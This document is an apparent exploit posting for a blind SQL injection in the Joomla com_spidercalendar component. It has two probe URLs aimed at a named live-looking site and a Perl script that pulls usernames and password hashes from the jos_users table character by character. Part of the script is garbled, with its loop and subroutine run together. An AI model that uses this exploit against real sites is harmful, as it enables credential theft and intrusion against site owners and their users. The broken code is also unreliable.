http://www.saawf.co.za/index.php?option=com_spidercalendar&view=spidercal endar&calendar_id=1+and+1=1+--+&module_id=60&date60=2012-08-11&Itemid=

http://www.saawf.co.za/index.php?option=com_spidercalendar&view=spidercal endar&calendar_id=1+and+1=0+--+&module_id=60&date60=2012-08-11&Itemid=

#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print " \n"; print " ################################################## ##############\n"; print " # Joomla Component com_spidercalendar Blind SQL Injection Exploit #\n"; print " # Author:winstrool #\n"; print " ################################################## ##############\n"; exit; } my $host = $ARGV[0]; my $path = $ARGV[1]; my $tid = $ARGV[2]; my %options = (); GetOptions(\%options, "p=s", "t=i"); print "[~] Exploiting...\n"; if($options{"t"}) { $tid = $options{"t"}; } syswrite(STDOUT, "[~] MD5-Hash: ", 14); for(my $i = 1; $i new; my $query = "http://".$host.$path."index.php?option=com_spidercalendar &calendar_id=".$tid." and (SUBSTRING((SELECT concat(username,0x3a,password,0x3a,usertype) from jos_users limit 0,1),".$i.",1))=CHAR(".$h.") -- &module_id=60&date60=2012-08-11&Itemid=" ; if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); } my $resp = $ua->get($query); my $content = $resp->as_string; if($content =~ /Rankings/) { #print $h; return 1; } else { return 0; } }